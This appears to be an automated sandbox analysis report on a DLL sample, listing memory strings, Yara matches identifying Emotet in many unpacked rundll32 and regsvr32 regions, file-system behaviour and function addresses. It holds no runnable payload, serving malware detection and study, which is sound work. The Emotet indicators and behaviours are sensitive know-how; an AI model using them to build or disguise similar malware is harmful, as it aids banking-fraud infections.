                      Source: svchost.exe, 00000014.00000003.805231702.0000020B3A794000.00000004.00000001.sdmpString found in binary or memory: trings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify - Music and Podcasts","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NCBCSZSJRSB","Properties":{"FulfillmentData":{"ProductId":"9NCBCSZSJRSB","WuCategoryId":"5c353b9c-7ac7-4d27-af07-923e7d9aa2e2","PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","SkuId":"0011"},"FulfillmentType":"WindowsUpdate","FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"Spotify"}],"Architectures":["x86"],"Capabilities":["internetClient","runFullTrust","Microsoft.storeFilter.core.notSupported_8wekyb3d8bbwe"],"ExperienceIds":[],"MaxDownloadSizeInBytes":104380919,"MaxInstallSizeInBytes":203345920,"PackageFormat":"Appx","PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","MainPackageFamilyNameForDlc":null,"PackageFullName":"SpotifyAB.SpotifyMusic_1.176.447.0_x86__zpdnekdrzrea0","PackageId":"3fbafb47-f476-4c26-4445-49acb9a726e6-X86","PackageRank":30001,"PlatformDependencies":[{"MaxTested":2814750754275328,"MinVersion":2814750710366559,"PlatformName":"Windows.Desktop"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.isMain\":false,\"content.packageId\":\"SpotifyAB.SpotifyMusic_1.176.447.0_x86__zpdnekdrzrea0\",\"content.productId\":\"caac1b9d-621b-4f96-b143-e10e1397740a\",\"content.targetPlatforms\":[{\"platform.maxVersionTested\":2814750754275328,\"platform.minVersion\":2814750710366559,\"platform.target\":3}],\"content.type\":7,\"policy\":{\"category.first\":\"app\",\"category.second\":\"Music\",\"optOut.backupRestore\":true,\"optOut.removeableMedia\":false},\"policy2\":{\"ageRating\":3,\"optOut.DVR\":false,\"thirdPartyAppRatings\":[{\"level\":9,\"systemId\":3},{\"leve
                      Source: svchost.exe, 00000014.00000002.822439687.0000020B3A700000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.799118884.0000020B3A70D000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: svchost.exe, 00000014.00000002.822309970.0000020B39EE9000.00000004.00000001.sdmpString found in binary or memory: http://crl.ver)
                      Source: 77EC63BDA74BD0D0E0426DC8F80085060.14.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: svchost.exe, 00000014.00000003.798251058.0000020B3A790000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.798329573.0000020B3A76E000.00000004.00000001.sdmpString found in binary or memory: http://help.disneyplus.com.
                      Source: Amcache.hve.16.drString found in binary or memory: http://upx.sf.net
                      Source: svchost.exe, 00000014.00000003.798251058.0000020B3A790000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.798329573.0000020B3A76E000.00000004.00000001.sdmpString found in binary or memory: https://disneyplus.com/legal.
                      Source: svchost.exe, 00000014.00000003.798251058.0000020B3A790000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.798329573.0000020B3A76E000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                      Source: svchost.exe, 00000014.00000003.798251058.0000020B3A790000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.798329573.0000020B3A76E000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                      Source: svchost.exe, 00000014.00000003.800900762.0000020B3AC02000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.800918679.0000020B3A790000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.800834222.0000020B3AC19000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.800807896.0000020B3AC19000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.800791461.0000020B3A7A1000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.800774631.0000020B3A790000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10001280 recvfrom,2_2_10001280
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10027958 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,2_2_10027958
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10027958 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,3_2_10027958

                      E-Banking Fraud:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 14.2.rundll32.exe.55b0000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.5030000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4770000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.53b0000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.de0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.5510000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.2e30000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.52a0000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.56f0000.15.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.de0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.59a0000.18.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.de0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.4780000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4cb0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.49a0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.53e0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.52d0000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.5570000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.e10000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.5270000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.5570000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.49d0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.5540000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.de0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.de0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.59d0000.19.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.34d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.2510000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.5a20000.20.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.5a20000.20.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.53b0000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.52d0000.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.de0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4740000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.4750000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4c80000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.5300000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.52a0000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.2540000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.55e0000.13.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4c80000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.5110000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.55b0000.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.57a0000.16.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.5a50000.21.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.5030000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.57d0000.17.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.57a0000.16.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.56c0000.14.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.5210000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.52f0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.2e00000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.3500000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.2510000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.5140000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.52b0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.5510000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.4750000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.5060000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.5110000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.5270000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.5130000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.e10000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.5270000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.49a0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.34d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.59a0000.18.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.5160000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.5130000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.56c0000.14.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.5240000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.5270000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.5210000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.2e00000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4740000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.52b0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.718929777.0000000003501000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1188125968.00000000049D1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1190726376.00000000059A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.718904101.00000000034D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.719243124.0000000005161000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.719379711.00000000052A1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.719211601.0000000005130000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1190213897.00000000057D1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.719345888.0000000005270000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.719826672.00000000053B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.719773637.00000000052F1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1188426833.0000000005110000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1188330842.0000000005030000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.719527275.0000000004CB1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.719316941.0000000005241000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.719898030.0000000005510000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.723238837.0000000004750000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1188469714.0000000005141000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.670020972.0000000004740000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1186610997.0000000002E00000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1188598739.00000000052A1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.719919636.0000000005541000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1188659452.0000000005301000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.720219818.0000000000DE0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.669938310.0000000002541000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.720240608.0000000000E11000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.719503580.0000000004C80000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1188052400.00000000049A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.719747240.00000000052B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1190813785.0000000005A20000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.719938381.0000000005570000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1190127401.00000000057A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.719857103.00000000053E1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.722455601.0000000000E11000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.719284878.0000000005210000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1188878871.00000000055E1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1186687872.0000000002E31000.00000020.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1188363449.0000000005061000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1190848028.0000000005A51000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1188631120.00000000052D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.722263663.0000000000DE0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1188973289.00000000056F1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1188839400.00000000055B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.723309788.0000000004781000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.670044528.0000000004771000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1188934735.00000000056C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.742599060.0000000000DE0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1188553677.0000000005270000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.669913455.0000000002510000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1190787571.00000000059D1000.00000020.00000001.sdmp, type: MEMORY

                      System Summary:

                      barindex
                      Source: nV5Wu77N8J.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 7128 -ip 7128
                      Source: C:\Windows\SysWOW64\rundll32.exeFile deleted: C:\Windows\SysWOW64\Bdaefwhkzqb\lrinxnmhyts.ogu:Zone.IdentifierJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Bdaefwhkzqb\Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_100291F62_2_100291F6
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1002F3782_2_1002F378
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_100403D72_2_100403D7
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1004250B2_2_1004250B
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_100415572_2_10041557
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_100395A12_2_100395A1
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1002F7842_2_1002F784
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1004091B2_2_1004091B
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1002EACF2_2_1002EACF
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1002FBA42_2_1002FBA4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100291F63_2_100291F6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002F3783_2_1002F378
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100403D73_2_100403D7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1004250B3_2_1004250B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100415573_2_10041557
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100395A13_2_100395A1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002F7843_2_1002F784
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1004091B3_2_1004091B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002EACF3_2_1002EACF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002FBA43_2_1002FBA4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10035D963_2_10035D96
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10040E5F3_2_10040E5F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002EFA43_2_1002EFA4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CBA4454_2_04CBA445
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CCB2574_2_04CCB257
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CC4A664_2_04CC4A66
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CBDE744_2_04CBDE74
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CC7A0F4_2_04CC7A0F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CD20094_2_04CD2009
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CB86364_2_04CB8636
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CCEFDD4_2_04CCEFDD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CBC5D84_2_04CBC5D8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CC85FF4_2_04CC85FF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CD17BD4_2_04CD17BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CC654A4_2_04CC654A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CC21424_2_04CC2142
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CCFF584_2_04CCFF58
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CCE9554_2_04CCE955
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CB670B4_2_04CB670B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CD2B094_2_04CD2B09
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CCAD084_2_04CCAD08
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CB80C04_2_04CB80C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CCCCD94_2_04CCCCD9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CCD8DB4_2_04CCD8DB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CCCAD54_2_04CCCAD5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CBF0E94_2_04CBF0E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CD00EF4_2_04CD00EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CD3EE94_2_04CD3EE9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CCE4E54_2_04CCE4E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CCBEFD4_2_04CCBEFD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CBBAA94_2_04CBBAA9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CC3EAA4_2_04CC3EAA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CD36AA4_2_04CD36AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CCA2A54_2_04CCA2A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CB1CA14_2_04CB1CA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CD46BD4_2_04CD46BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CC0EBC4_2_04CC0EBC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CBC6B84_2_04CBC6B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CC0ABA4_2_04CC0ABA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CC42444_2_04CC4244
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CB74424_2_04CB7442
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CBE6404_2_04CBE640
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CCF8404_2_04CCF840
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CC2E5D4_2_04CC2E5D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CD0A644_2_04CD0A64
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CD32634_2_04CD3263
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CB7E794_2_04CB7E79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CB70784_2_04CB7078
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CC567B4_2_04CC567B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CCA4744_2_04CCA474
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CBA8714_2_04CBA871
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CCDC714_2_04CCDC71
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CC88064_2_04CC8806
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CC9A014_2_04CC9A01
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CBB8204_2_04CBB820
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CB34314_2_04CB3431
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CCFBDE4_2_04CCFBDE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CBE7DE4_2_04CBE7DE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CCC5D54_2_04CCC5D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CC67E64_2_04CC67E6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CCE1F84_2_04CCE1F8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CB55FF4_2_04CB55FF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CC27F94_2_04CC27F9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CB4BFC4_2_04CB4BFC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CC07F44_2_04CC07F4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CC9DF54_2_04CC9DF5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CBFB8E4_2_04CBFB8E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CB238C4_2_04CB238C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CC3D854_2_04CC3D85
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CC0F864_2_04CC0F86
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CC61874_2_04CC6187
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CB21944_2_04CB2194
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CC8FAE4_2_04CC8FAE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CD07AA4_2_04CD07AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CB77A34_2_04CB77A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CCD1BC4_2_04CCD1BC
